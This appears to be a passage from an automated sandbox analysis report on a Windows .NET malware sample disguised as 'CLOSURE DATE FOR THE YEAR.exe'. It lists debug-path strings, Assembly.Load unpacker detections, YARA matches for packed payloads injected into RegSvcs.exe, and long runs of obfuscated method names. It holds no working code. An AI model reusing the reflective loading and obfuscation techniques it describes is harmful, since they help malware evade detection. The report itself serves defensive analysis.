Source:	Binary string: System.Windows.Forms.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\IOsbBBIDAm.PDB. source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb8 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb!v9 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbSystem.Windows.Forms.dllSystem.Windows.Forms.dll source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb1 source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: mscorlib.pdb ) source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbDDa source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs	.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3cf1d80.0.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs	.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.cs	.Net Code: vYyfjfDEmi System.Reflection.Assembly.Load(byte[])
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.72f0000.3.raw.unpack, L2.cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.402bdc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.IOsbBBIDAm.exe.4011da0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret		8_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret		8_2_00402AFC

Source: CLOSURE DATE FOR THE YEAR.exe	Static PE information: section name: .text entropy: 7.674643796191771
Source: IOsbBBIDAm.exe.0.dr	Static PE information: section name: .text entropy: 7.674643796191771

Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, g7pDvOofIfvqWkp63rw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tgq5K1s6GeBooaKkHr.cs	High entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, z8paIcKHrfZRQqDqsW.cs	High entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, hPnrdUD69NejYvVSTw.cs	High entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, YUFVMJb03ibTQVxCwX.cs	High entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, n8h02gia35Fex3cMef.cs	High entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, ra2Pp4P84BlxAjGQIX.cs	High entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, KZnRcyw2XS3ZBSeVU9.cs	High entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, MJ3rWMvHWVA6OCb5fl.cs	High entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, vt6OdGgtWVkrmoPpyf.cs	High entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, tcTjZnfH2xCKW4Wn2U.cs	High entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, iHL0ugXHc1U2KmhbPV.cs	High entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, swx3Z7yEPbC2qYGpNs.cs	High entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, J3HuoK4x7sHRBmYd8P.cs	High entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, uS0YNRrX5wLVHg6CLX.cs	High entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, IJ2K90edp4HgKMGk5G.cs	High entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, ut7yIPoojS59To19taD.cs	High entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, i0rvbCom5cxEaaFcfVu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, msNyQU2nVWMubc2q1n.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, dxLZjud1Le1aRTLBqp.cs	High entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, IIb6nsuCF2hJDVepff.cs	High entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, jviyFnUkOEMiWAYfmN.cs	High entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, kNh5SizdpcJ7dyOosl.cs	High entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.9470000.4.raw.unpack, MB18GvlNmXshVsF6VX.cs	High entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, g7pDvOofIfvqWkp63rw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tgq5K1s6GeBooaKkHr.cs	High entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, z8paIcKHrfZRQqDqsW.cs	High entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, hPnrdUD69NejYvVSTw.cs	High entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, YUFVMJb03ibTQVxCwX.cs	High entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, n8h02gia35Fex3cMef.cs	High entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, ra2Pp4P84BlxAjGQIX.cs	High entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, KZnRcyw2XS3ZBSeVU9.cs	High entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, MJ3rWMvHWVA6OCb5fl.cs	High entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, vt6OdGgtWVkrmoPpyf.cs	High entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, tcTjZnfH2xCKW4Wn2U.cs	High entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, iHL0ugXHc1U2KmhbPV.cs	High entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, swx3Z7yEPbC2qYGpNs.cs	High entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, J3HuoK4x7sHRBmYd8P.cs	High entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, uS0YNRrX5wLVHg6CLX.cs	High entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, IJ2K90edp4HgKMGk5G.cs	High entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, ut7yIPoojS59To19taD.cs	High entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, i0rvbCom5cxEaaFcfVu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, msNyQU2nVWMubc2q1n.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, dxLZjud1Le1aRTLBqp.cs	High entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, IIb6nsuCF2hJDVepff.cs	High entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs	High entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, kNh5SizdpcJ7dyOosl.cs	High entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, MB18GvlNmXshVsF6VX.cs	High entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, g7pDvOofIfvqWkp63rw.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fK3c0OZQ3F', 'lZccpdhk56', 'vw6ca0pIrH', 'mJYccCiwd0', 'aGDcAFDSD5', 'z69cZUZKtk', 'd64c9LjkOQ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tgq5K1s6GeBooaKkHr.cs	High entropy of concatenated method names: 'ktrlDZ51f4', 'KPClhdDfsW', 'pY6lygk2Mj', 'FXIlT749Q6', 'MUGlRsCk1t', 'OmAlv5KADJ', 'WQglrKebI3', 'K6dlVxPNkb', 'MP7lKKKLsV', 'SunluxKaob'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, z8paIcKHrfZRQqDqsW.cs	High entropy of concatenated method names: 'Wsr0wVMF25', 'kqi0gEqA6H', 'FvX0B3aB5h', 'gO20PdrsbY', 'InW0SRKC52', 'mrP0L3bFYP', 'Lb00drbRJ7', 'lGV0EJcoxi', 'bxH0ejpa7s', 'pnb0I9KBW9'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, hPnrdUD69NejYvVSTw.cs	High entropy of concatenated method names: 'mf18I7NoYW', 'FHJ853x4UC', 'pqr8DmqbXo', 'jtH8hQlVoZ', 'uio8gf9BuN', 'C5T8BD5h8M', 'kPW8PpCnBA', 'X6K8S6kwek', 'AGG8LGJJEN', 'HJ58dgjgRT'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, YUFVMJb03ibTQVxCwX.cs	High entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, n8h02gia35Fex3cMef.cs	High entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, ra2Pp4P84BlxAjGQIX.cs	High entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, KZnRcyw2XS3ZBSeVU9.cs	High entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, MJ3rWMvHWVA6OCb5fl.cs	High entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
